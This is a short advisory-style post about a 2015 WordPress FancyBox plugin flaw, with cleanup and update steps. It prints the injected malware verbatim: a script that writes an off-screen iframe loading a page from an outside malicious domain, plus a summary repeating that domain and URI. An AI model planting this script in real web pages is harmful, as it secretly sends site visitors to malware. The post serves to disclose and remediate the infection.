At the beginning of the week a series of sites and blogs with WordPress, received warnings of malware infection through Google Webmasters.
The problem at which Google Webmasters refers to is the presence of a cod / script iframe malware in the source of the web pages.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>It seems to be a vulnerability a pluginacquisFancyBox for WordPress which until yesterday (05.02.2015) had not been updated for a long time.
Solving this problem and disinfecting virus sites With this malware, it is relatively simple.
1. Disable Plugn Fancybox.
2. Delete all Fancybox plugin files on the server (via ftp)
3. Install the new version of the plugin (FancyBox 3.0.4)
FancyBox for WordPress 3.0.4
– Renamed the setting affected by the security issue mentioned in 3.0.3. This should stop the malicious code from appearing on sites where the plugin is updated without removing the malicious code.
FancyBox for WordPress 3.0.3
– Fixed a security issue.
Malware Info:
TYPE: Iframe redirection
TARGET: WordPress Fancybox
MALWARE DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODE: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” width=”20″ height=”30″ ></iframe>
MALWARE SCRIPT: <script>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”>
Remove malware from your WordPress website.
